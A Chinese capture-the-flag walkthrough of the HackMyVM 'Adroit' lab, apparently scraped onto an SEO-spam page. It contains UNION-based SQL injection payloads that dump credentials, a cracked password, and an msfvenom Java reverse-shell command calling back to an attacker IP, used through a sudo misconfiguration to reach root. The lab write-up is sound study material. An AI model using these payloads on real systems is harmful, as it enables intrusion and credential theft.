当前位置: 首页 > news >正文

怎么在网上找接单做网站的公司风烛源网站管理系统

怎么在网上找接单做网站的公司,风烛源网站管理系统,做一款推荐类的网站,没有网站做优化tags: HMVjava反编译SQL注入 1. 基本信息^toc 文章目录 1. 基本信息^toc2. 信息收集3. java反编译4. sql注入5. 解密密码6. 提权 靶机链接 https://hackmyvm.eu/machines/machine.php?vmAdroit 作者 alienum 难度 ⭐️⭐️⭐️⭐️️ 2. 信息收集 ┌──(root㉿kali)-[~] └… tags: HMVjava反编译SQL注入 1. 基本信息^toc 文章目录 1. 基本信息^toc2. 信息收集3. java反编译4. sql注入5. 解密密码6. 提权 靶机链接 https://hackmyvm.eu/machines/machine.php?vmAdroit 作者 alienum 难度 ⭐️⭐️⭐️⭐️️ 2. 信息收集 ┌──(root㉿kali)-[~] └─# fscan -h 192.168.80.11___ _/ _ \ ___ ___ _ __ __ _ ___| | __/ /_\/____/ __|/ __| __/ _ |/ __| |/ / / /_\\_____\__ \ (__| | | (_| | (__| \____/ |___/\___|_| \__,_|\___|_|\_\fscan version: 1.8.4 start infoscan 192.168.80.11:3306 open 192.168.80.11:3000 open 192.168.80.11:21 open 192.168.80.11:22 open [*] alive ports len is: 4 start vulscan [] ftp 192.168.80.11:21:anonymous[-]pub ftp ftp ls -a 229 Entering Extended Passive Mode (|||40570|) 150 Here comes the directory listing. drwxr-xr-x 2 ftp ftp 4096 Mar 19 2021 . drwxr-xr-x 3 ftp ftp 4096 Jan 14 2021 .. -rw-r--r-- 1 ftp ftp 5451 Jan 14 2021 adroitclient.jar -rw-r--r-- 1 ftp ftp 229 Mar 19 2021 note.txt -rw-r--r-- 1 ftp ftp 36430 Jan 14 2021 structure.PNG structrue.png 3. java反编译 获取到secret Sup3rS3cur3Dr0it 域名 adroit.local 用户名 zeus 域名 god.thunder.olympus 添加一个域名 adroit.local 尝试运行一下jar包 这里我用jdk8运行不了 切换到jdk11可以运行 提示输入账户密码 挨个测试即可 ┌──(root㉿kali)-[/home/kali/hmv/Adroit] └─# java -jar adroitclient.jar Enter the username : zeus Enter the password : Sup3rS3cur3Dr0it Wrong username or password ┌──(root㉿kali)-[/home/kali/hmv/Adroit] └─# java -jar adroitclient.jar Enter the username : zeus Enter the password : god.thunder.olympus Options [ post | get ] : get Enter the phrase identifier : 1 god.thunder.olympus 就是密码 4. sql注入 ┌──(root㉿kali)-[/home/kali/hmv/Adroit] └─# java -jar adroitclient.jar Enter the username : zeus Enter the password : god.thunder.olympus Options [ post | get ] : get Enter the phrase identifier :1 union select 1,database() -- - -- adroit1 union select 1,group_concat(table_name) FROM information_schema.tables WHERE table_schema adroit -- - -- ideas,users1 union select 1,group_concat(column_name) from information_schema.columns where table_name users -- - -- id,username,password,USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS1 union select 1,group_concat(username,0x3a,password) from users -- - -- writer:l4AnpxSxDcYCl0mgxKr015OEC3aOfdrWafSqwpY获取到了账户密码 writer:l4AnpxSxDcYCl0mgxKr015OEC3aOfdrWafSqwpY 但是密码是加密的 但是加密的 5. 解密密码 解密的代码可以在jar包反编译中发现 密钥上面获取到了是 Sup3rS3cur3Dr0it 但是注意这里需要将0换成O 所以正确的密钥是 Sup3rS3cur3DrOit 参考 Mikannse的wp对这个进行解密 获取到密码是 just.write.my.ideas 6. 提权 利用账户密码登录 writer just.write.my.ideas ┌──(root㉿kali)-[/home/kali/hmv/Adroit] └─# ssh writer192.168.80.11 writer192.168.80.11s password: Linux adroit 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Thu Jan 14 23:14:06 2021 from 10.0.2.15 writeradroit:~$ id uid1000(writer) gid1000(writer) groups1000(writer),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth) writeradroit:~$ whoami writer writeradroit:~$ sudo -l [sudo] password for writer: Matching Defaults entries for writer on adroit:env_reset, mail_badpass, secure_path/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser writer may run the following commands on adroit:(root) /usr/bin/java -jar /tmp/testingmyapp.jar msf生成jar包 反弹shell msfvenom -p java/shell_reverse_tcp lhost192.168.80.5 lport4444 -f jar -o reverse.jarwriteradroit:/tmp$ cp reverse.jar /tmp/testingmyapp.jar writeradroit:/tmp$ sudo -u root java -jar /tmp/testingmyapp.jar[17:54:28] Welcome to pwncat ! __main__.py:164 [17:56:16] received connection from 192.168.80.11:51550 bind.py:84 [17:56:17] 0.0.0.0:4444: upgrading from /usr/bin/dash to /usr/bin/bash manager.py:957192.168.80.11:51550: registered new host w/ db manager.py:957 (local) pwncat$ (remote) rootadroit:/tmp# whoami root (remote) rootadroit:/root# ls root.txt (remote) rootadroit:/root# cat root.txt 017a030885f25af277dd891d0f151845 (remote) rootadroit:/root# cd /home/writer/ (remote) rootadroit:/home/writer# cat user.txt 61de3a25161dcb2b88b5119457690c3c (remote) rootadroit:/home/writer#我觉得这个靶场不算难。难点只是在分析java代码那里不过我看不懂java
http://www.w-s-a.com/news/692339/

相关文章:

  • 室内设计公司 网站建设建站塔山双喜
  • 网站建设属于什么经营范围销售网站开发业务
  • 企业建站系统平台优秀网站作品截图
  • 杭州品牌网站制作wordpress多域名移动主题
  • 北京网站网站建设icp备案 网站备案
  • 长春网站公司哪家好电子商务网站建设作文
  • 网站开发php程序员网上店铺怎么运营
  • mip网站怎么做匹配h5婚纱摄影网站模板
  • 怎么注册建设公司网站域名历史价格查询
  • 爱站网seo工具包互联网软件开发工程师
  • 百度站长工具平台登录郑州seo规则
  • 财税公司做网站精品建站教程
  • 建设区块链网站区块链开发平台有哪些
  • 青年人爱看的网站ie显示wordpress网页不完整
  • 优惠券推广网站怎么做青岛正规网站建设哪家便宜
  • 怎么搞一个服务器建设网站wordpress页眉编辑
  • 计算机企业网站建设论文流量平台是什么意思
  • 成都建设网站公司哪家好上海有名的广告公司
  • 收录优美图片找不到了整站seo优化一般多少钱
  • 大型网站建设哪家好汉川网页设计
  • 深圳品牌策划公司推荐南昌网站怎么做seo
  • 滨州做微商城网站备案时暂时关闭网站
  • 手机网站样式代码网站是怎样制作的
  • 任务发布网站建设苏州园区房价
  • 网站的认识知识付费做的最好的平台
  • 企业电子商务网站设计的原则深圳的网站建设公司怎么样
  • 个人网站趋向wordpress图片搬家
  • 做空压机网站的公司有哪些wordpress 外部链接
  • 网站建设管理成本估计小红书推广平台
  • 一级a做爰片免费观看网站焦作建设企业网站公司